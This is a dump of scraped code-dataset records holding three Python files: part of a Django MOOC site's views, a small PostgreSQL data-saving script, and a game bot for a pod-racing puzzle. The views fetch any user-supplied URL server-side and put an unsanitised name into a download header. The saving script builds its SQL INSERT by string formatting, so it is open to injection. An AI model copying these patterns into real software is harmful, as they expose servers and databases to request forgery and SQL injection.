offset = len(judge)\n for num in range(0, len(option)):\n if request.POST.get('option' + str(num + offset)) == None:\n answer.append(' ')\n questions[num + offset].user_answer = ''\n else:\n answer.append(request.POST.get('option' + str(num + offset)))\n questions[num + offset].user_answer = answer[num + offset]\n #------------------------------------------------------------------------\n if datetime.date.today() <= last_time:\n #计算得分\n #在提交时间内保存题目分数,逾期不保存\n for i in range(0, len(answer)):\n if answer[i] == questions[i].answer:\n testscore += questions[i].question_score\n teststore.Answer = ''.join(answer)\n teststore.score = testscore\n teststore.save()\n else:\n #逾期不保存任何信息\n teststore.delete()\n return ren2res('./course/test.html', request,\n {'Questions': questions, 'Answer': answer, 'TestScore': testscore, 'course_id': course_id,\n 'unit_cnt': unit_cnt, 'test_counter': test_counter})\n except:\n raise Http404\n else:\n return HttpResponseRedirect('/')\n\n\n@login_required\ndef member(request):\n if request.method == 'GET':\n user = request.user\n result = StudyStatus.objects.filter(user=user)\n course_in = []\n course_out = []\n for studystatus in result:\n course = studystatus.course\n if studystatus.course_time.begin_time == course.cur_time.begin_time:\n units = course.units.all()\n deltadays = int((datetime.date.today() - course.cur_time.begin_time).days)\n for unit in units:\n deltadays = deltadays - int(unit.gap_days)\n if deltadays <= 0:\n process_num = int(float(unit.counter)/float(len(units))*100)\n print(process_num)\n course_in.append([course, process_num])\n break\n else:\n course_out.append([course, studystatus.course_time.begin_time])\n return ren2res('./user/personal.html', request, {'course_in': course_in, 'course_out': course_out})\n\n\ndef get_file(request):\n url = str(request.GET.get('url'))\n f = urllib2.urlopen(url)\n data = f.read()\n response = FileResponse(data)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"test.pdf\"'\n return response\n\n\ndef download(request):\n url = str(request.GET.get('url'))\n name = request.GET.get('name')\n f = urllib2.urlopen(url)\n data = f.read()\n response = FileResponse(data)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"'+name+'.pdf\"'\n print(name)\n return response\n\n\n\n@login_required\ndef ttt(request):\n if not request.user.has_perm('Mooc.can_change_user'):\n raise Http404\n STORAGE_URL='http://moockitchen-mooc.stor.sinaapp.com/'\n if request.method == 'GET':\n return ren2res('ttt.html', request, {})\n else:\n content = request.FILES['file1']\n online = environ.get(\"APP_NAME\", \"\")\n if online:\n import sae.const\n access_key = sae.const.ACCESS_KEY\n secret_key = sae.const.SECRET_KEY\n appname = sae.const.APP_NAME\n domain_name = \"mooc\"\n import sae.storage\n\n s = sae.storage.Client()\n ob = sae.storage.Object(content.read())\n type = str(request.POST.get('type'))\n subtype = str(request.POST.get('subtype'))\n if type == 'section':\n course_id = request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n unit_id = request.POST.get('unit_id')\n unit = course.units.all().get(counter=unit_id)\n section_id = request.POST.get('section_id')\n section = unit.sections.all().get(counter=section_id)\n dir = str(subtype)+'/'+str(course_id)+'_'+str(unit_id)+'_'+str(section_id)\n if subtype == 'pdf':\n section.pdf = STORAGE_URL+dir\n elif subtype == 'video':\n section.video = STORAGE_URL+dir\n else:\n raise Http404\n section.save()\n elif type == 'img':\n if subtype == 'course':\n course_id = request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n dir = str(type)+'/'+str(subtype)+'/'+str(course_id)\n course.img = STORAGE_URL+dir\n course.save()\n elif subtype == 'user':\n user_id = request.POST.get('user_id')\n user = User.objects.get(id=user_id)\n userinfo = user.info\n dir = str(type)+'/'+str(subtype)+'/'+str(user_id)\n userinfo.img = STORAGE_URL+dir\n userinfo.save()\n elif subtype == 'problem':\n problem_id = request.POST.get('problem_id')\n problem = QuizQuestion.objects.get(id=problem_id)\n dir = str(type)+'/'+str(subtype)+'/'+str(problem_id)+'/summary'\n problem.image = STORAGE_URL+dir\n problem.save()\n elif subtype == 'option':\n problem_id = request.POST.get('problem_id')\n problem = QuizQuestion.objects.get(id=problem_id)\n option_id = str(request.POST.get('option_id'))\n dir = str(type)+'/'+'problem'+'/'+str(problem_id)+'/'+str(option_id)\n if option_id == 'a':\n problem.image_a = STORAGE_URL+dir\n elif option_id == 'b':\n problem.image_b = STORAGE_URL+dir\n elif option_id == 'c':\n problem.image_c = STORAGE_URL+dir\n elif option_id == 'd':\n problem.image_d = STORAGE_URL+dir\n else:\n raise Http404\n problem.save()\n else:\n raise Http404\n elif type == 'serverfile':\n dir = str(request.POST.get('dir'))\n else:\n raise Http404\n url = s.put(domain_name, dir, ob)\n return ren2res('ttt.html', request, {'value': url})\n else:\n return ren2res('ttt.html', request, {'value': 'save failed'})\n\n@login_required\ndef create_message(request):\n servertime = datetime.date.today()\n user = request.user\n course_id = request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n content = request.POST.get('content')\n reference_id = request.POST.get('reference_id')\n if reference_id is None:\n reference_id = -1\n floor_counter = int(len(Message.objects.all().filter(course=course)))+1\n message = Message(user=user, course=course, reference=reference_id, content=content, floor=floor_counter,\n publishTime=servertime)\n message.save()\n return JsonResponse({'message': u'上传成功'})\n\n@login_required\ndef keepnote(request):\n print('innote')\n if request.is_ajax():\n t = loader.get_template('./course/note.html')\n course_id = request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n unit_cnt = request.POST.get('unit_cnt')\n note_content = request.POST.get('content')\n try:\n note = UserNote.objects.get(user_id=request.user.id,course=course,unit_counter=unit_cnt)\n note.content=note_content\n except Exception:\n note = UserNote(course=course,unit_counter=unit_cnt,user_id=request.user.id,content=note_content)\n note.save()\n content_html = t.render(Context({'usernote': note}))\n return HttpResponse(content_html)\n\n@login_required\ndef get_messages(request):\n if request.is_ajax():\n t = loader.get_template('./course/message.html')\n course_id = request.GET.get('course_id')\n course = Course.objects.get(id=course_id)\n messages = course.messages.all().order_by('floor')\n content_html = t.render(Context({'messages': messages}))\n return HttpResponse(content_html)\n\n@login_required\ndef set_likes(request):\n course_id = request.GET.get('course_id')\n course = Course.objects.get(id=course_id)\n user = request.user\n query_result = LikeUserCourse.objects.filter(user=user, course=course)\n if len(query_result) == 0:\n new = LikeUserCourse(user=user, course=course)\n new.save()\n course.likeCounter += 1\n html_data = '+1'\n else:\n old = query_result[0]\n old.delete()\n course.likeCounter -= 1\n html_data = '-1'\n course.save()\n return JsonResponse({'likeCounter': course.likeCounter, 'html_data': html_data})\n\ndef getCourseClass(request):\n #根据courseclass获取课程的类别\n #根据number判断加载课程的数量\n #根据Flag判断是否需要加载更多的按钮\n if request.is_ajax():\n t = loader.get_template('courseclass.html')\n courseclass = request.GET.get('content_class')\n search_text = request.GET.get('content_text')\n number = request.GET.get('number')\n if number is None:\n number=1\n else:\n number=int(number)\n if search_text==\"\" or search_text is None:\n if courseclass=='all':\n courses = list(Course.objects.all()[0:6*number])\n if Course.objects.all().count() > len(courses):\n Flag = True\n else:\n Flag = False\n else:\n courses = list(Course.objects.filter(courseClass=courseclass)[0:6*number])\n if Course.objects.filter(courseClass=courseclass).count() > len(courses):\n Flag = True\n else:\n Flag = False\n elif courseclass==\"\":\n courses = list(Course.objects.filter(name__icontains=search_text)[0:6*number])\n if Course.objects.filter(name__icontains=search_text).count() > len(courses):\n Flag = True\n else:\n Flag = False\n courses_num=[]\n for i in range(0,len(courses)):\n if((i+1)%3 == 1):\n courses_num.append([courses[i],0])\n elif ((i+1)%3 == 2):\n courses_num.append([courses[i],-1])\n else:\n courses_num.append([courses[i],1])\n number=number+1\n if search_text==\"\" or search_text is None:\n content_html = t.render(Context({'courses_num':courses_num,'courseclass':courseclass,'number':number,'Flag':Flag}))\n elif courseclass==\"\":\n content_html = t.render(Context({'courses_num':courses_num,'search_text':search_text,'number':number,'Flag':Flag}))\n return HttpResponse(content_html)\n\ndef search(request):\n # if request.is_ajax():\n # t = loader.get_template('./course/search.html')\n data = request.GET.get('search_text')\n courses = list(Course.objects.filter(name__icontains=data)[0:6])\n if Course.objects.filter(name__icontains=data).count() > len(courses):\n Flag = True\n else:\n Flag = False\n search_text = data\n print(search_text)\n number=2\n courses_num=[]\n for i in range(0,len(courses)):\n if((i+1)%3 == 1):\n courses_num.append([courses[i],0])\n elif ((i+1)%3 == 2):\n courses_num.append([courses[i],-1])\n else:\n courses_num.append([courses[i],1])\n # content_html = t.render(Context({{'courses_num': courses_num,'courseclass':courseclass,\n # 'number':number,'Flag':Flag,}}))\n print(\"Hello++++++++++++++\")\n # return HttpResponse(content_html)\n return ren2res('./course/search.html', request, {'courses_num': courses_num,'search_text':search_text,\n 'number':number,'Flag':Flag,})\n","sub_path":"Mooc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":41951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"111262454","text":"import psycopg2\nfrom datetime import datetime\nfrom db_connect import db_conn_fn\n\n\n\n\nconn = db_conn_fn()\nc = conn.cursor()\n\n\ndef save_data(utc,askp,bidp,askv,bidv,curr):\n\n try:\n c.execute(\"INSERT INTO data2 (utc,askprice, bidprice, askvolume,bidvolume, currency) VALUES ('%s','%s','%s','%s','%s','%s')\"%(utc,askp,bidp,askv,bidv,curr))\n conn.commit()\n except Exception as e:\n print('error while saving raw data')\n print(str(e))","sub_path":"fat/old/to_prod3/data_saving.py","file_name":"data_saving.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"577908926","text":"import sys\nimport math\nimport cmath\n\n# game loop\nthrust_def = 100\nthrust_zero = 0\nboost_used = 0\n\ndef circle_point(check_x, check_y, angle, radius):\n center = [ check_x, check_y]\n from math import cos, sin, pi\n circ_x = center[0] + (radius * cos(angle))\n circ_y = center[1] + (radius * sin(angle))\n return circ_x, circ_y\n\ndef my_vector (chpnt, my_loc):\n difference = [ my_loc[0] - chpnt[0], my_loc[1] - chpnt[1] ]\n pod_vec = math.sqrt(float(difference[0]**2) + float(difference[1]**2))\n return int(pod_vec)\n\ndef ene_vector (chpnt, ene_loc):\n difference = [ ene_loc[0] - chpnt[0], ene_loc[1] - chpnt[1] ]\n ene_vec = math.sqrt(float(difference[0]**2) + float(difference[1]**2))\n return int(ene_vec)\n\n\ndef calc_nchp (chpnt_x, chpnt_y):\n if chpnt_x > chpnt_y:\n chpnt_x = int(chpnt_x - 187)\n elif chpnt_y < 810 and chpnt_x > chpnt_y:\n chpnt_y = int(chpnt_y + 140)\n chpnt_x = int(chpnt_x)\n else:\n chpnt_y = int(chpnt_y - 187)\n return chpnt_x, chpnt_y\n \n\n\nnum_chp = 0\nturn = 0\nwhile True:\n # Write an action using print\n # To debug: print(\"Debug messages...\", file=sys.stderr)\n # You have to output the target position\n # followed by the power (0 <= thrust <= 100)\n # next_checkpoint_x: x position of the next check point\n # next_checkpoint_y: y position of the next check point\n # next_checkpoint_dist: distance to the next checkpoint\n # next_checkpoint_angle: angle between your pod orientation and the direction of the next checkpoint\n x, y, next_checkpoint_x, next_checkpoint_y, next_checkpoint_dist, next_checkpoint_angle = [int(i) for i in input().split()]\n opponent_x, opponent_y = [int(i) for i in input().split()] \n ## my variables\n nch_y = next_checkpoint_y\n nch_x = next_checkpoint_x\n nch_angle = next_checkpoint_angle\n nch_dist = next_checkpoint_dist\n ene_x = opponent_x\n ene_y = opponent_y\n enemy_loc = [ ene_x, ene_y ]\n moje_loc = [ x, y ]\n nch_loc = [ nch_x, nch_y ]\n last_check = nch_loc\n \n # count vectors mine and enemy's\n EPOD_VECTOR = ene_vector(nch_loc, enemy_loc)\n POD_VECTOR = my_vector(nch_loc, moje_loc)\n \n #vypocitej upravene souradnice dalsiho checkpointu\n nch_loc = calc_nchp(nch_x, nch_y) \n [x+1000 for x in nch_loc]\n \n# pocitani a pohyb bota\n while moje_loc[0] >= nch_loc[0] or moje_loc[1] >= nch_loc[1]: #dokud nejsou x nebo y stejne nebo vetsi\n thrust = int(thrust_def * (nch_dist/1650)) #uprav rychlost dle vzdalenosti\n if thrust >= 100: # korekce kvuli maximu rychlosti\n thrust = thrust_def \n nch_loc = calc_nchp(nch_x, nch_y) #spocitej souradnice dalsiho checkpointu\n [x+1000 for x in nch_loc] # uprav souradnice dalsiho checkpointu\n if nch_dist >= 8500 and nch_angle == 0 and boost_used == 0 and turn >= 1: # BOOST usage\n thrust = \"BOOST\"\n boost_used = 1\n elif EPOD_VECTOR == POD_VECTOR: #boost na kolizni kurz\n thrust = \"BOOST\"\n boost_used = 1 \n print(str(nch_loc[0]) + \" \" + str(nch_loc[1]) + \" \" + str(thrust)) # zadani kurzu a rychlosti\n break\n else: # zbytek podminky\n if nch_dist >= 8500 and nch_angle == 0 and boost_used == 0 and turn >= 1: #BOOST usage\n thrust = \"BOOST\"\n boost_used = 1\n elif EPOD_VECTOR == POD_VECTOR:\n thrust = \"BOOST\"\n boost_used = 1\n print(str(nch_loc[0]) + \" \" + str(nch_loc[1]) + \" \" + str(thrust)) #zadani kurzu a rychlosti\n \n \n\n\n #print(str(nch_loc[0]) + \" \" + str(nch_loc[1]) + \" \" + str(thrust))\n turn = int(turn)+1\n num_chp = int(num_chp)+1\n\n","sub_path":"last.py","file_name":"last.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}